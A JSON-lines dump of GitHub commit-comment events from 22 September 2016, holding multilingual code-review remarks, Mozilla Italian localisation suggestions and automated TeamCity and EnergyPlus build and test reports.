{"id":"4601716362","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128157,"position":null,"line":null,"path":null,"commit_id":"4f389d914b818b17e20c6e24f5814d65bdbb0d92","created_at":"2016-09-22T10:53:13Z","updated_at":"2016-09-22T10:53:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1109](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13916&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T10:53:13Z"}
{"id":"4601721501","type":"CommitCommentEvent","actor":{"login":"ddugovic"},"repo":{"name":"ianfab/Stockfish"},"payload":{"comment":{"id":19128167,"position":null,"line":null,"path":null,"commit_id":"e63c89db988e0de93c51c6d17c6b0827fc665cbd","created_at":"2016-09-22T10:54:24Z","updated_at":"2016-09-22T10:54:24Z","body":"Yes, your fix is efficient although it's strange that search continues after a player has lost their king."}},"created_at":"2016-09-22T10:54:24Z"}
{"id":"4601722374","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19128170,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T10:54:36Z","updated_at":"2016-09-22T10:54:36Z","body":"my  r2 is from 2016-08-26 ... now 73min"}},"created_at":"2016-09-22T10:54:36Z"}
{"id":"4601723616","type":"CommitCommentEvent","actor":{"login":"ChaosZar"},"repo":{"name":"IncarVishnu/platformer"},"payload":{"comment":{"id":19128174,"position":null,"line":null,"path":null,"commit_id":"d7e3b7affbe296db932b24d92cd4ceef7a588069","created_at":"2016-09-22T10:54:55Z","updated_at":"2016-09-22T10:54:55Z","body":"Moin,\r\n\r\nSollte man die Tieles nicht evtl. unabhängig von dem Levels irgendwo sammelen, sodass diese einfach wiederverwertet werden können?\r\n\r\nIch denke in ein Level gehören start position der Objekte (Spieler, etc.) die Musik, die abgespielt werden soll und evtl. noch informationen wie länge höhe und anzahl der Tiles, sodass man diese nicht ständig berechnen muss.\r\n\r\nVG\r\n    Alex"}},"created_at":"2016-09-22T10:54:55Z"}
{"id":"4601725490","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128177,"position":null,"line":null,"path":null,"commit_id":"4f389d914b818b17e20c6e24f5814d65bdbb0d92","created_at":"2016-09-22T10:55:22Z","updated_at":"2016-09-22T10:55:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1109](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13916&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler Build time: 00:02:09"}},"created_at":"2016-09-22T10:55:22Z"}
{"id":"4601726256","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128178,"position":null,"line":null,"path":null,"commit_id":"9d9c0451a6fb32579565b0b70cae0ff8f364b63f","created_at":"2016-09-22T10:55:33Z","updated_at":"2016-09-22T10:55:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1110](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13919&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T10:55:33Z"}
{"id":"4601727208","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128181,"position":null,"line":null,"path":null,"commit_id":"9d9c0451a6fb32579565b0b70cae0ff8f364b63f","created_at":"2016-09-22T10:55:48Z","updated_at":"2016-09-22T10:55:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1110](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13919&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:00:14"}},"created_at":"2016-09-22T10:55:48Z"}
{"id":"4601728849","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19128186,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T10:56:12Z","updated_at":"2016-09-22T10:56:12Z","body":"mine: radare2   0.9.6-3.1ubuntu1"}},"created_at":"2016-09-22T10:56:12Z"}
{"id":"4601729971","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128189,"position":null,"line":null,"path":null,"commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T10:56:29Z","updated_at":"2016-09-22T10:56:29Z","body":"/cc @kitsunenosaraT \r\n"}},"created_at":"2016-09-22T10:56:29Z"}
{"id":"4601733047","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19128197,"position":44,"line":101,"path":"UM/Settings/Models/InstanceContainersModel.py","commit_id":"2b9a914335f46e52f23a3d07954d103f414c4f59","created_at":"2016-09-22T10:57:15Z","updated_at":"2016-09-22T10:57:15Z","body":"(And whitespace around operators.)"}},"created_at":"2016-09-22T10:57:15Z"}
{"id":"4601734410","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":19128200,"position":5,"line":139,"path":"scripts/h5peditor-dimensions.js","commit_id":"c70cac28c9171f2ccc7a3765b02196a6547e1b62","created_at":"2016-09-22T10:57:35Z","updated_at":"2016-09-22T10:57:35Z","body":"Issue should be fixed in a2b91a918b919fa8ce543a9a5cb02a756a780a6a"}},"created_at":"2016-09-22T10:57:35Z"}
{"id":"4601734592","type":"CommitCommentEvent","actor":{"login":"ffont"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19128202,"position":null,"line":null,"path":null,"commit_id":"0fa36f20c80b2128b88715020136babd15e4055d","created_at":"2016-09-22T10:57:38Z","updated_at":"2016-09-22T10:57:38Z","body":"Hi @andrebola, can you make a pull request of all the pack download changes?"}},"created_at":"2016-09-22T10:57:38Z"}
{"id":"4601737728","type":"CommitCommentEvent","actor":{"login":"LukaKovacica"},"repo":{"name":"LukaKovacica/freeradius-bshellmanager"},"payload":{"comment":{"id":19128207,"position":null,"line":null,"path":null,"commit_id":"a5489e53a400e46b8c2f6331c82d878d9e6d048f","created_at":"2016-09-22T10:58:26Z","updated_at":"2016-09-22T10:58:26Z","body":"echo \"startsh=\"1\" #This allows this file to run $appdir.sh\" >> $runme"}},"created_at":"2016-09-22T10:58:26Z"}
{"id":"4601740526","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19128229,"position":null,"line":null,"path":null,"commit_id":"90ff30d8c68c3acd2709789fb834e5ad64e63f69","created_at":"2016-09-22T10:59:07Z","updated_at":"2016-09-22T10:59:07Z","body":"you made a speling mistake in the commit message"}},"created_at":"2016-09-22T10:59:07Z"}
{"id":"4601742069","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19128237,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T10:59:29Z","updated_at":"2016-09-22T10:59:29Z","body":"radare2 0.10.4-git 11893 @ linux-x86-64 git.0.10.3-160-g8f6c471\r\ncommit: 8f6c4716e0b1272eebff9cb74c289b1033a6da9b build: 2016-08-26\r\n\r\nwink... @radare :)"}},"created_at":"2016-09-22T10:59:29Z"}
{"id":"4601743987","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19128241,"position":null,"line":null,"path":null,"commit_id":"eff536c5239fdd16a6b96bdcdc7b6456a58c349d","created_at":"2016-09-22T10:59:57Z","updated_at":"2016-09-22T10:59:57Z","body":"128792325-Issue5803 (wfbuhl) - Win64-Windows-7-VisualStudio-12: OK (2295 of 2330 tests passed, 537 test warnings)\n\n * 567 tests had: AUD diffs.\n * 119 tests had: ERR diffs.\n * 29 tests had: Table big diffs.\n * 185 tests had: EIO diffs.\n * 28 tests had: ESO small diffs.\n * 14 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 5 tests had: MTR big diffs.\n * 24 tests had: RDD diffs.\n * 14 tests had: MTR small diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.5%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T10:59:57Z"}
{"id":"4601745557","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19128247,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-22T11:00:17Z","updated_at":"2016-09-22T11:00:17Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.176](http://build.clear-measure.com/viewLog.html?buildId=10620&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-22T11:00:17Z"}
{"id":"4601748864","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128272,"position":5,"line":6,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:01:03Z","updated_at":"2016-09-22T11:01:03Z","body":"su -> per?"}},"created_at":"2016-09-22T11:01:03Z"}
{"id":"4601752524","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128285,"position":null,"line":null,"path":null,"commit_id":"c4c5ad093e207d44f562fac97d961cfe23ad277c","created_at":"2016-09-22T11:01:54Z","updated_at":"2016-09-22T11:01:54Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1112](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13923&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T11:01:54Z"}
{"id":"4601753345","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128287,"position":null,"line":null,"path":null,"commit_id":"c4c5ad093e207d44f562fac97d961cfe23ad277c","created_at":"2016-09-22T11:02:07Z","updated_at":"2016-09-22T11:02:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1111](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13921&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Tests failed: 1 (1 new), passed: 88, ignored: 2) Build time: 00:06:13\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T11:02:07Z"}
{"id":"4601754446","type":"CommitCommentEvent","actor":{"login":"wowvisio"},"repo":{"name":"simllll/TourGuide"},"payload":{"comment":{"id":19128289,"position":null,"line":null,"path":null,"commit_id":"c5b7e37cd5412925aabd7485c33f9437ddaf16f3","created_at":"2016-09-22T11:02:22Z","updated_at":"2016-09-22T11:02:22Z","body":"same issue please fix it"}},"created_at":"2016-09-22T11:02:22Z"}
{"id":"4601757913","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19128298,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-22T11:03:11Z","updated_at":"2016-09-22T11:03:11Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.176](http://build.clear-measure.com/viewLog.html?buildId=10620&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:52"}},"created_at":"2016-09-22T11:03:11Z"}
{"id":"4601757935","type":"CommitCommentEvent","actor":{"login":"mstaring"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19128299,"position":null,"line":null,"path":null,"commit_id":"42478b0cf10b2bf64e96b204a8cd507d5669a1d8","created_at":"2016-09-22T11:03:11Z","updated_at":"2016-09-22T11:03:11Z","body":"I am in favor of having an executable, which is THE executable, that can do all of the SuperElastix library. It then makes sense to call that executable superelastix(.exe), even though there can be other example interfaces of using the SuperElastix library."}},"created_at":"2016-09-22T11:03:11Z"}
{"id":"4601762159","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"yasu80/dotfiles"},"payload":{"comment":{"id":19128312,"position":null,"line":null,"path":null,"commit_id":"1cf9ea575ba99450b7311cbacb43382d6626e361","created_at":"2016-09-22T11:04:14Z","updated_at":"2016-09-22T11:04:14Z","body":"あともし、'git 'を打ち込むのがめんどいからやってるんだったらなるべくやめる方がいいことをお伝えする("}},"created_at":"2016-09-22T11:04:14Z"}
{"id":"4601763564","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128318,"position":11,"line":11,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:04:35Z","updated_at":"2016-09-22T11:04:35Z","body":"No, zona rossa decisamente no, pessime associazioni. Al momento non ho grandi idee, i francesi hanno \"Naviga verso nuovi orizzonti\", ma non mi piace granché."}},"created_at":"2016-09-22T11:04:35Z"}
{"id":"4601764116","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128319,"position":16,"line":15,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:04:43Z","updated_at":"2016-09-22T11:04:43Z","body":"Prova per primo…"}},"created_at":"2016-09-22T11:04:43Z"}
{"id":"4601767787","type":"CommitCommentEvent","actor":{"login":"finn-christiansen"},"repo":{"name":"finn-christiansen/solidstate"},"payload":{"comment":{"id":19128326,"position":null,"line":null,"path":null,"commit_id":"0265226df51800e2aa4c3f78c8e7c05b8922bb77","created_at":"2016-09-22T11:05:40Z","updated_at":"2016-09-22T11:05:40Z","body":"Die Enthalpie habe ich schon beim Thermodynamik Kapitel genau so beschrieben. Ich werde sie aus diesem Teil loeschen. Ok?"}},"created_at":"2016-09-22T11:05:40Z"}
{"id":"4601768072","type":"CommitCommentEvent","actor":{"login":"rubycut"},"repo":{"name":"influxdata/kapacitor"},"payload":{"comment":{"id":19128329,"position":null,"line":null,"path":null,"commit_id":"2289c9dc4e2cba2af32200b84b5d47ab157ade8e","created_at":"2016-09-22T11:05:44Z","updated_at":"2016-09-22T11:05:44Z","body":"Cool idea."}},"created_at":"2016-09-22T11:05:44Z"}
{"id":"4601769101","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128330,"position":26,"line":23,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:05:59Z","updated_at":"2016-09-22T11:05:59Z","body":"una segnalazione?"}},"created_at":"2016-09-22T11:05:59Z"}
{"id":"4601769501","type":"CommitCommentEvent","actor":{"login":"mstaring"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19128331,"position":null,"line":null,"path":null,"commit_id":"42478b0cf10b2bf64e96b204a8cd507d5669a1d8","created_at":"2016-09-22T11:06:03Z","updated_at":"2016-09-22T11:06:03Z","body":"I do not see this as an example actually, as this is one of the main interfaces that people are going to use. This is much of our product.\r\nPerhaps we should distinguish with interfaces that are fully supported, like the library and command line interface, and some example interfaces that only show how they work but are not fully backed up by us."}},"created_at":"2016-09-22T11:06:03Z"}
{"id":"4601776021","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128347,"position":31,"line":27,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:07:42Z","updated_at":"2016-09-22T11:07:42Z","body":"\"Consigli per una buona segnalazione/la segnalazione perfetta\"?"}},"created_at":"2016-09-22T11:07:42Z"}
{"id":"4601776521","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19128353,"position":null,"line":null,"path":null,"commit_id":"9f7136836586db45993f7dd2af6902fc159a2086","created_at":"2016-09-22T11:07:50Z","updated_at":"2016-09-22T11:07:50Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;kgAilfSZ&#x2F;43-comment\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Comment</a>"}},"created_at":"2016-09-22T11:07:50Z"}
{"id":"4601778014","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128357,"position":46,"line":39,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:08:11Z","updated_at":"2016-09-22T11:08:11Z","body":"con le versioni Aurora, ecc."}},"created_at":"2016-09-22T11:08:11Z"}
{"id":"4601778383","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128358,"position":null,"line":null,"path":null,"commit_id":"2b2e77d5edfa2163c9d67c3098509a95f3ad833a","created_at":"2016-09-22T11:08:17Z","updated_at":"2016-09-22T11:08:17Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1113](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13924&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T11:08:17Z"}
{"id":"4601778638","type":"CommitCommentEvent","actor":{"login":"ikurek"},"repo":{"name":"ikurek/PWr-App"},"payload":{"comment":{"id":19128359,"position":null,"line":null,"path":null,"commit_id":"78ecd3bf30faf3350d66ffabace5e72aded6f849","created_at":"2016-09-22T11:08:20Z","updated_at":"2016-09-22T11:08:20Z","body":"Dzięki :-)"}},"created_at":"2016-09-22T11:08:20Z"}
{"id":"4601788989","type":"CommitCommentEvent","actor":{"login":"incubus"},"repo":{"name":"ondrejbartas/sidekiq-cron"},"payload":{"comment":{"id":19128396,"position":10,"line":61,"path":"lib/sidekiq/cron/job.rb","commit_id":"b0c22b4562375f86275c1476646380de4982de5a","created_at":"2016-09-22T11:10:35Z","updated_at":"2016-09-22T11:10:35Z","body":"HI!\r\n\r\n  Yes, I'm using yml config. It's a simple sidekiq worker without setting queue name inside. The problem is in the empty `@queue_name_with_prefix` in `enqueue_sidekiq_worker` method. I'll investigate this.\r\n  "}},"created_at":"2016-09-22T11:10:35Z"}
{"id":"4601789414","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128397,"position":76,"line":63,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:10:42Z","updated_at":"2016-09-22T11:10:42Z","body":"Direi che ti sei perso il significato dell'originale: \"stable environment\" è da mantenere, \"della versione stabile\" -> \"in un ambiente stabile\" (è riferito alla beta che stai provando, non alla release successiva)."}},"created_at":"2016-09-22T11:10:42Z"}
{"id":"4601790445","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128400,"position":81,"line":67,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:10:55Z","updated_at":"2016-09-22T11:10:55Z","body":"le build -> le versioni"}},"created_at":"2016-09-22T11:10:55Z"}
{"id":"4601792328","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128407,"position":86,"line":71,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:11:24Z","updated_at":"2016-09-22T11:11:24Z","body":"nelle versioni non definitive più stabili."}},"created_at":"2016-09-22T11:11:24Z"}
{"id":"4601793884","type":"CommitCommentEvent","actor":{"login":"ondenman"},"repo":{"name":"everypolitician/everypolitician-data"},"payload":{"comment":{"id":19128413,"position":null,"line":null,"path":null,"commit_id":"6988ee577323044f1966f44ca0597e4c170bd037","created_at":"2016-09-22T11:11:48Z","updated_at":"2016-09-22T11:11:48Z","body":"I've reset to a previous commit and committed the changes separately. "}},"created_at":"2016-09-22T11:11:48Z"}
{"id":"4601795101","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19128417,"position":null,"line":null,"path":null,"commit_id":"70345e281510e401e89ae90ac08acd2ce6ef4e7d","created_at":"2016-09-22T11:12:06Z","updated_at":"2016-09-22T11:12:06Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 254](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1215&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:26:37"}},"created_at":"2016-09-22T11:12:06Z"}
{"id":"4601795182","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128418,"position":null,"line":null,"path":null,"commit_id":"c4c5ad093e207d44f562fac97d961cfe23ad277c","created_at":"2016-09-22T11:12:07Z","updated_at":"2016-09-22T11:12:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1112](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13923&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 4 (4 new), passed: 219, ignored: 3 Build time: 00:10:13\n### Failed tests\n```\norg.genivi.sota.resolver.test.PackageFilterResourceWordSpec.Package filter resource should fail to list filters associated to a package if a non-existant package name is given: <no details avaliable>\n\norg.genivi.sota.resolver.test.PackageFilterResourceWordSpec.Package filter resource should fail to list filters associated to a package if a non-existant package version is given: <no details avaliable>\n\norg.genivi.sota.resolver.test.ResolveResourceSpec.Resolve resource should fail if a non-existing package name is given: <no details avaliable>\n\norg.genivi.sota.resolver.test.ResolveResourceSpec.Resolve resource should fail if a non-existing package version is given: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T11:12:07Z"}
{"id":"4601798747","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128430,"position":96,"line":79,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:13:01Z","updated_at":"2016-09-22T11:13:01Z","body":"Crea, effettua test, controlla il tuo lavoro con diverse dimensioni dello schermo e molto altro ancora nell'unico…"}},"created_at":"2016-09-22T11:13:01Z"}
{"id":"4601799509","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128433,"position":106,"line":87,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:13:13Z","updated_at":"2016-09-22T11:13:13Z","body":"Utilizza"}},"created_at":"2016-09-22T11:13:13Z"}
{"id":"4601800038","type":"CommitCommentEvent","actor":{"login":"KalamaresFTW"},"repo":{"name":"KalamaresFTW/PracticasDS"},"payload":{"comment":{"id":19128436,"position":42,"line":50,"path":"DS-34-11-B1/src/ejercicio1/Collatz.java","commit_id":"2adfafa040a8adb9141fa0f294301ef1fd7ca478","created_at":"2016-09-22T11:13:20Z","updated_at":"2016-09-22T11:13:20Z","body":"Esto podría estar mal si le pasas un array a la función que solo contenga 0's\r\n"}},"created_at":"2016-09-22T11:13:20Z"}
{"id":"4601802072","type":"CommitCommentEvent","actor":{"login":"NBruderman"},"repo":{"name":"night/BetterTTV"},"payload":{"comment":{"id":19128440,"position":null,"line":null,"path":null,"commit_id":"e4b09b8246e49bfb687c5f69178a0da17b4dc24d","created_at":"2016-09-22T11:13:51Z","updated_at":"2016-09-22T11:13:51Z","body":"Seems to do the trick, thanks a lot!"}},"created_at":"2016-09-22T11:13:51Z"}
{"id":"4601802277","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":19128443,"position":null,"line":null,"path":null,"commit_id":"a0291ceddc19c445419754a26df04cb71fe9b699","created_at":"2016-09-22T11:13:54Z","updated_at":"2016-09-22T11:13:54Z","body":"@whitequark Just want to make sure you are aware of the above."}},"created_at":"2016-09-22T11:13:54Z"}
{"id":"4601802533","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19128444,"position":5,"line":13,"path":"it/firefox/features.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T11:13:57Z","updated_at":"2016-09-22T11:13:57Z","body":"utilizzando -> grazie a (vedi string corrente)"}},"created_at":"2016-09-22T11:13:57Z"}
{"id":"4601803640","type":"CommitCommentEvent","actor":{"login":"AndreiLux"},"repo":{"name":"AndreiLux/ref-3.10"},"payload":{"comment":{"id":19128448,"position":null,"line":null,"path":null,"commit_id":"c68dd00b5a674e093187682a4764f10523b4fbcf","created_at":"2016-09-22T11:14:15Z","updated_at":"2016-09-22T11:14:15Z","body":"You can keep it to something very low."}},"created_at":"2016-09-22T11:14:15Z"}
{"id":"4601805134","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19128455,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T11:14:37Z","updated_at":"2016-09-22T11:14:37Z","body":"ehem, what about upgrading to git? this is like 6 months old"}},"created_at":"2016-09-22T11:14:37Z"}
{"id":"4601805175","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":19128456,"position":null,"line":null,"path":null,"commit_id":"a0291ceddc19c445419754a26df04cb71fe9b699","created_at":"2016-09-22T11:14:38Z","updated_at":"2016-09-22T11:14:38Z","body":"> people will ultimately want to issue (RTIO-) timed SPI commands to the DACs\r\n\r\nSo all the DAC initialization is done by the Metlino, over DRTIO?"}},"created_at":"2016-09-22T11:14:38Z"}
{"id":"4601807175","type":"CommitCommentEvent","actor":{"login":"SkyFire"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19128465,"position":21,"line":54,"path":"src/server/game/Server/Protocol/Opcodes.h","commit_id":"77e0801a15d4736972d3c458b1f282b7ff2a9d8c","created_at":"2016-09-22T11:15:09Z","updated_at":"2016-09-22T11:15:09Z","body":"Just so you know. It makes no difference adding a zero in the front of opcodes the values remain the same. Other than readability."}},"created_at":"2016-09-22T11:15:09Z"}
{"id":"4601810800","type":"CommitCommentEvent","actor":{"login":"jalgamestudios"},"repo":{"name":"TeamEisprinzessin/secret-wolf"},"payload":{"comment":{"id":19128479,"position":null,"line":null,"path":null,"commit_id":"2b1cb418c664dc394903a8a9bbcdb154028f37e5","created_at":"2016-09-22T11:16:00Z","updated_at":"2016-09-22T11:16:00Z","body":"How dare you?!"}},"created_at":"2016-09-22T11:16:00Z"}
